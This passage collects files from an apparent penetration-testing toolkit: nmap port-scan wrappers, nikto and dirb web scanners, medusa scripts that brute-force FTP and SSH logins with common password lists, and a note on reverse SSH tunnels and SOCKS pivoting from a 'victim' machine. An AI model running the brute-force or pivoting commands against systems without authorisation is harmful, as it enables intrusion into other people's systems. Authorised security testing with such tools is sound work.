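# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Full TCP connect scan (-sT) of all ports, in sequential port order (-r),
# without host discovery (-Pn) and with a fixed delay between probes.
# Output: tcp_ports_full_delay_sequential_<target>.{nmap,gnmap,xml}

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 2 ]]; then
  echo "Please provide the target IP address or an IP range and the scan delay time(seconds)." 1>&2
  exit 1
fi

target=$1
delay=$2

# CIDR ranges contain '/', which would turn the -oA basename into a path in a
# directory that does not exist; replace it for the file name only.
nmap -sT -vv -r -p- --reason -Pn --open --scan-delay "$delay" \
  -oA "tcp_ports_full_delay_sequential_${target//\//_}" "$target"

--------------------------------------------------------------------------------
/web/nikto-scan-useragent.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.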
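#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Nikto scan of <scheme>://<host>:<port> with a caller-supplied User-Agent.
# Output: <scheme>_<host>_<port>_nikto.html (report) and .txt (console log).

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 4 ]]; then
  echo "Please provide the target protocol scheme (http or https), target IP address or hostname, the target port and the user agent string." 1>&2
  exit 1
fi

scheme=$1
host=$2
port=$3
user_agent=$4
report_base="${scheme}_${host}_${port}_nikto"

# The user agent is passed as one quoted argument: User-Agent strings usually
# contain spaces and would otherwise be split into stray nikto arguments.
nikto -ask=no -h "${scheme}://${host}:${port}" -output "${report_base}.html" \
  -useragent "$user_agent" 2>&1 | tee "${report_base}.txt"

--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Full TCP SYN scan of all ports on the target.
# Output: tcp_ports_full_<target>.{nmap,gnmap,xml}

# SYN scans (-sS) need raw-socket privileges, hence the root check.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address or an IP range." 1>&2
  exit 1
fi

target=$1

# CIDR ranges contain '/', which would turn the -oA basename into a path in a
# directory that does not exist; replace it for the file name only.
nmap -sS -vv -p- --reason --open -oA "tcp_ports_full_${target//\//_}" "$target"

--------------------------------------------------------------------------------
/cracking/brute-force-ftp-medusa.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Password-guessing run against an FTP service with medusa, using the SecLists
# short username list and top-100 password list.
# Output: ftp_<target>_<port>_medusa.txt

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 2 ]]; then
  echo "Please provide the target FTP server and its port." 1>&2
  exit 1
fi

target=$1
port=$2

# Arguments are quoted so whitespace or glob characters cannot split into
# extra medusa options.
medusa -v 4 \
  -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" \
  -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" \
  -f -e ns -n "$port" \
  -O "ftp_${target}_${port}_medusa.txt" -M ftp -h "$target"

--------------------------------------------------------------------------------
/cracking/brute-force-ssh-medusa.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.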
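#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Password-guessing run against an SSH service with medusa, using the SecLists
# short username list and top-100 password list.
# Output: ssh_<target>_<port>_medusa.txt

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 2 ]]; then
  echo "Please provide the target SSH server and its port." 1>&2
  exit 1
fi

target=$1
port=$2

# Arguments are quoted so whitespace or glob characters cannot split into
# extra medusa options.
medusa -v 4 \
  -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" \
  -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" \
  -f -e ns -n "$port" \
  -O "ssh_${target}_${port}_medusa.txt" -M ssh -h "$target"

--------------------------------------------------------------------------------
/misc/ssh.md:
--------------------------------------------------------------------------------
1 | ## SSH Tunnels
2 |
3 | ### Reverse SSH Tunnel
4 |
5 | *From the victim machine to our attacking box.*
6 |
7 | ```bash
8 | plink -l root -pw -R 3390:127.0.0.1:3389
9 | ```
10 |
11 | ### SSH Local Port Forwarding
12 |
13 | ```bash
14 | ssh -L 0.0.0.0:4444::4444
15 | ```
16 |
17 | ```bash
18 | ssh -L 10443::443 user@
19 | ```
20 |
21 | ```bash
22 | ssh -L 0.0.0.0:45001::80 user@
23 | ```
24 |
25 | ### SSH Dynamic Port Forwarding
26 |
27 | * Set a local listening port and have it tunnel incoming traffic to any remote destination through a socks proxy.
28 | * SSH to create a socks4 proxy on our local attacking box and tunnel all incoming traffic to that port through DMZ network of our victim.
29 | * Forward/Tunnel and redirect our traffic to the victim's machine.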
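30 |
31 | ```bash
32 | ssh -f -N -D 9050 root@victim.example.com
33 | ```
34 |
35 | * proxychains
36 |
37 | ```bash
38 | nano /etc/proxychains.conf
39 | ```
40 |
41 | * Content
42 |
43 | ```bash
44 | [ProxyList]
45 | #...
46 | socks4 127.0.0.1 9050
47 | ```
48 |
49 | * Run e.g. nmap
50 |
51 | ```bash
52 | proxychains nmap -p 80 -sT -Pn x.x.x.0/24 --open
53 | ```
54 |
--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-nodns.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Full TCP SYN scan of all ports, without DNS resolution (-n).
# Output: tcp_ports_full_<target>.{nmap,gnmap,xml}

# SYN scans (-sS) need raw-socket privileges, hence the root check.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address or an IP range." 1>&2
  exit 1
fi

target=$1

# CIDR ranges contain '/', which would turn the -oA basename into a path in a
# directory that does not exist; replace it for the file name only.
nmap -sS -n -vv -p- --reason --open -oA "tcp_ports_full_${target//\//_}" "$target"

--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# TCP SYN scan of the 1000 most common ports.
# Output: tcp_ports_1000_<target>.{nmap,gnmap,xml}

# SYN scans (-sS) need raw-socket privileges, hence the root check.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address or an IP range." 1>&2
  exit 1
fi

target=$1

# CIDR ranges contain '/', which would turn the -oA basename into a path in a
# directory that does not exist; replace it for the file name only.
nmap -sS -vv --top-ports 1000 --open -oA "tcp_ports_1000_${target//\//_}" "$target"

--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-noping.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.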
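#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Full TCP SYN scan of all ports, without host discovery (-Pn).
# Output: tcp_ports_full_<target>.{nmap,gnmap,xml}

# SYN scans (-sS) need raw-socket privileges, hence the root check.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address or an IP range." 1>&2
  exit 1
fi

target=$1

# CIDR ranges contain '/', which would turn the -oA basename into a path in a
# directory that does not exist; replace it for the file name only.
nmap -sS -vv -p- -Pn --reason --open -oA "tcp_ports_full_${target//\//_}" "$target"

--------------------------------------------------------------------------------
/port-scanning/udp/udp-ports-scan-top1000.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.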
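#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# UDP scan of the 1000 most common ports.
# Output: udp_ports_full_<target>.{nmap,gnmap,xml}
# NOTE(review): the basename says "full" although only the top 1000 ports are
# scanned; a full UDP scan written with the same basename in the same
# directory would overwrite these results. Name kept as the original has it.

# UDP scans (-sU) need raw-socket privileges, hence the root check.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address or an IP range." 1>&2
  exit 1
fi

target=$1

# CIDR ranges contain '/', which would turn the -oA basename into a path in a
# directory that does not exist; replace it for the file name only.
nmap -sU -vv --top-ports 1000 --reason --open -oA "udp_ports_full_${target//\//_}" "$target"

--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-noping-nodns.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Full TCP SYN scan of all ports, without DNS resolution (-n) or host
# discovery (-Pn).
# Output: tcp_ports_full_<target>.{nmap,gnmap,xml}

# SYN scans (-sS) need raw-socket privileges, hence the root check.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address or an IP range." 1>&2
  exit 1
fi

target=$1

# CIDR ranges contain '/', which would turn the -oA basename into a path in a
# directory that does not exist; replace it for the file name only.
nmap -sS -n -Pn -vv -p- --reason --open -oA "tcp_ports_full_${target//\//_}" "$target"

--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Full TCP SYN scan of all ports with the -T4 timing template, without DNS
# resolution (-n) or host discovery (-Pn).
# Output: tcp_ports_full_<target>.{nmap,gnmap,xml}

# SYN scans (-sS) need raw-socket privileges, hence the root check.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address or an IP range." 1>&2
  exit 1
fi

target=$1

# CIDR ranges contain '/', which would turn the -oA basename into a path in a
# directory that does not exist; replace it for the file name only.
nmap -sS -n -Pn -vv -p- --reason --open -T4 -oA "tcp_ports_full_${target//\//_}" "$target"

--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000-noping.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.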
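#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# TCP SYN scan of the 1000 most common ports, without host discovery (-Pn).
# Output: tcp_ports_1000_<target>.{nmap,gnmap,xml}

# SYN scans (-sS) need raw-socket privileges, hence the root check.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address or an IP range." 1>&2
  exit 1
fi

target=$1

# CIDR ranges contain '/', which would turn the -oA basename into a path in a
# directory that does not exist; replace it for the file name only.
nmap -sS -vv --top-ports 1000 -Pn --reason --open -oA "tcp_ports_1000_${target//\//_}" "$target"

--------------------------------------------------------------------------------
/port-scanning/udp/udp-ports-scan-top1000-nodns.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.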
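# See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# UDP scan of the 1000 most common ports, without DNS resolution (-n).
# Output: udp_ports_top1000_<target>.{nmap,gnmap,xml}

# UDP scans (-sU) need raw-socket privileges, hence the root check.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address or an IP range." 1>&2
  exit 1
fi

target=$1

# CIDR ranges contain '/', which would turn the -oA basename into a path in a
# directory that does not exist; replace it for the file name only.
nmap -sU -n -vv --top-ports 1000 --reason --open -oA "udp_ports_top1000_${target//\//_}" "$target"

--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000-noping-nodns.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# TCP SYN scan of the 1000 most common ports, without DNS resolution (-n) or
# host discovery (-Pn).
# Output: tcp_ports_1000_<target>.{nmap,gnmap,xml}

# SYN scans (-sS) need raw-socket privileges, hence the root check.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address or an IP range." 1>&2
  exit 1
fi

target=$1

# CIDR ranges contain '/', which would turn the -oA basename into a path in a
# directory that does not exist; replace it for the file name only.
nmap -sS -n -Pn -vv --top-ports 1000 --reason --open -oA "tcp_ports_1000_${target//\//_}" "$target"

--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top2000-noping-nodns.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# TCP SYN scan of the 2000 most common ports, without DNS resolution (-n) or
# host discovery (-Pn).
# Output: tcp_ports_2000_<target>.{nmap,gnmap,xml}

# SYN scans (-sS) need raw-socket privileges, hence the root check.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address or an IP range." 1>&2
  exit 1
fi

target=$1

# CIDR ranges contain '/', which would turn the -oA basename into a path in a
# directory that does not exist; replace it for the file name only.
nmap -sS -n -Pn -vv --top-ports 2000 --reason --open -oA "tcp_ports_2000_${target//\//_}" "$target"

--------------------------------------------------------------------------------
/port-scanning/udp/udp-ports-scan-top1000-noping.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# UDP scan of the 1000 most common ports, without host discovery (-Pn).
# Output: udp_ports_top1000_<target>.{nmap,gnmap,xml}

# UDP scans (-sU) need raw-socket privileges, hence the root check.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address or an IP range." 1>&2
  exit 1
fi

target=$1

# CIDR ranges contain '/', which would turn the -oA basename into a path in a
# directory that does not exist; replace it for the file name only.
nmap -sU -vv --top-ports 1000 -Pn --reason --open -oA "udp_ports_top1000_${target//\//_}" "$target"

--------------------------------------------------------------------------------
/web/dir-scanner.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.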
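#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Content discovery against a URL with dirb and the SecLists big.txt wordlist.
# Output: dirb_big_results_<sanitised url>.txt

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 1 ]]; then
  echo "Please provide the target url." 1>&2
  exit 1
fi

url=$1

# Derive the log name from the URL: runs of '/' and of '.' become '_' and ':'
# is dropped. A private variable is used instead of LOGNAME, which is the
# standard login-name environment variable and, being normally exported,
# would reach dirb with the wrong value.
log_file="dirb_big_results_$(printf '%s' "$url" | sed -E 's#/+#_#g; s/[.]+/_/g; s/:+//g').txt"

# URL and log name are quoted so they cannot split into extra dirb arguments.
dirb "$url" /usr/share/seclists/Discovery/Web-Content/big.txt -l -r -S -o "$log_file"

--------------------------------------------------------------------------------
/web/nikto-scan-useragent-proxy.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.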
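# See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Nikto scan of <scheme>://<host>:<port> through a proxy, with a
# caller-supplied User-Agent.
# Output: <scheme>_<host>_<port>_nikto.html (report) and .txt (console log).

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 5 ]]; then
  echo "Please provide the target protocol scheme (http or https), target IP address or hostname, the target port, the user agent string and the proxy server." 1>&2
  exit 1
fi

scheme=$1
host=$2
port=$3
user_agent=$4
proxy=$5
report_base="${scheme}_${host}_${port}_nikto"

# The user agent is passed as one quoted argument: User-Agent strings usually
# contain spaces and would otherwise be split into stray nikto arguments.
nikto -ask=no -h "${scheme}://${host}:${port}" -output "${report_base}.html" \
  -useragent "$user_agent" -useproxy "$proxy" 2>&1 | tee "${report_base}.txt"

--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-maxrate.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Full TCP SYN scan of all ports with a caller-supplied --max-rate cap.
# Output: tcp_ports_full_maxrate_<target>.{nmap,gnmap,xml}

# SYN scans (-sS) need raw-socket privileges, hence the root check.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 2 ]]; then
  echo "Please provide the target IP address or an IP range and the max rate." 1>&2
  exit 1
fi

target=$1
max_rate=$2

# CIDR ranges contain '/', which would turn the -oA basename into a path in a
# directory that does not exist; replace it for the file name only.
nmap -sS -vv -p- --reason --open --max-rate "$max_rate" \
  -oA "tcp_ports_full_maxrate_${target//\//_}" "$target"

--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2022 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# TCP SYN scan of the 1000 most common ports with the -T4 timing template,
# without DNS resolution (-n) or host discovery (-Pn).
# Output: tcp_ports_1000_<target>.{nmap,gnmap,xml}

# SYN scans (-sS) need raw-socket privileges, hence the root check.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address or an IP range." 1>&2
  exit 1
fi

target=$1

# CIDR ranges contain '/', which would turn the -oA basename into a path in a
# directory that does not exist; replace it for the file name only.
nmap -sS -n -Pn -vv --top-ports 1000 --open --reason -T4 -oA "tcp_ports_1000_${target//\//_}" "$target"

--------------------------------------------------------------------------------
/port-scanning/udp/full/udp-ports-scan-full.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Full UDP scan of all ports on the target.
# Output: udp_ports_full_<target>.{nmap,gnmap,xml}

# UDP scans (-sU) need raw-socket privileges, hence the root check.
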